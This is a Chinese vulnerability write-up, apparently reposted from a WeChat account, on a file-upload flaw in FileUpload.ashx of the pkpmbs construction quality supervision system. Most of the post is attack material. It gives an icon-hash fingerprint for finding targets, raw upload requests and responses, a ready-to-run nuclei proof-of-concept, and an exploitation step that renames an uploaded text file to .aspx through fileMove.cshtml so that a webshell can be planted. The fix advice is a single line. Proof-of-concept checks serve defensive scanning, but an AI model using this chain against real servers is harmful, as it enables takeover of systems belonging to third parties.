免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传漏洞
02
—
漏洞描述
pkpmbs 建设工程质量监督系统,是湖南建研信息技术股份有限公司下的一款工程管理软件,该系统FileUpload.ashx 处存在文件上传漏洞,攻击者可上传webshell控制服务器。
03
—
icon_hash="2001627082"
04
—
漏洞复现
向靶场发送如下数据包上传文件
POST /Platform/System/FileUpload.ashx HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeContent-Length: 336Accept-Encoding: gzipContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l------YsOxWxSvj1KyZow1PTsh98fdu6lContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"Content-Type: image/pngYsOxWxSvj1KyZow1PTsh98fdu6l------YsOxWxSvj1KyZow1PTsh98fdu6lContent-Disposition: form-data; name="target"/Applications/SkillDevelopAndEHS/------YsOxWxSvj1KyZow1PTsh98fdu6l--
响应内容如下
HTTP/1.1 200 OKConnection: closeContent-Length: 128Access-Control-Allow-Headers: Accept, Origin, Content-type,CrossDomainAccess-Control-Allow-Methods: *Access-Control-Allow-Origin: *Cache-Control: privateContent-Type: application/json; charset=utf-8Date: Thu, 30 Nov 2023 02:24:04 GMTServer: Microsoft-IIS/8.5Set-Cookie: ASP.NET_SessionId=kdldimtwukmwmn4k22duulxjk; path=/; HttpOnlyX-Aspnet-Version: 4.0.30319X-Powered-By: ASP.NET{"code":0,"msg":"上传成功","data":"http://x.x.x.x/Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt"}
查看回显文件
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36Connection: closeAccept-Encoding: gzip
响应数据包如下
HTTP/1.1 200 OKConnection: closeContent-Length: 27Accept-Ranges: bytesAccess-Control-Allow-Headers: Accept, Origin, Content-type,CrossDomainAccess-Control-Allow-Methods: *Access-Control-Allow-Origin: *Content-Type: text/plainDate: Thu, 30 Nov 2023 02:24:04 GMTEtag: W/"4d4c2493423da1:0"Last-Modified: Thu, 30 Nov 2023 02:24:04 GMTServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETYsOxWxSvj1KyZow1PTsh98fdu6l
证明存在漏洞
05
—
nuclei poc
poc文件内容如下
id: pkpmbs-FileUpload-fileuploadinfo:name: pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传漏洞author: fgzseverity: criticaldescription: 'pkpmbs 建设工程质量监督系统,是湖南建研信息技术股份有限公司下的一款工程管理软件,该系统FileUpload.ashx 处存在文件上传漏洞,攻击者可上传webshell控制服务器。'tags: 2023, pkpmbs, fileuploadmetadata:: 1: icon_hash="2001627082"verified: truehttp:raw:|POST /Platform/System/FileUpload.ashx HTTP/1.1Host: {{Hostname}}: multipart/form-data; boundary=----{{randstr}}: gzip: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15------{{randstr}}: form-data; name="file"; filename="{{randstr}}.txt": image/png{{randstr}}------{{randstr}}: form-data; name="target"/Applications/SkillDevelopAndEHS/------{{randstr}}--|GET /Applications/SkillDevelopAndEHS/{{randstr}}.txt HTTP/1.1Host: {{Hostname}}matchers:type: dsldsl:"status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{randstr}}')"
运行POC
nuclei.exe -t pkpmbs-FileUpload-fileupload.yaml -l 1.txt
06
—
漏洞利用
该漏洞无法直接上传aspx文件,但可以先上传txt再做个文件格式转换
GET /Applications/SkillDevelopAndEHS/fileMove.cshtml?filePath=上传的文件名&factFilePath=转换后文件名.aspx HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36Accept-Encoding: gzip
07
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):pkpmbs建设工程质量监督系统FileUpload.ashx文件上传漏洞(附POC exp)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论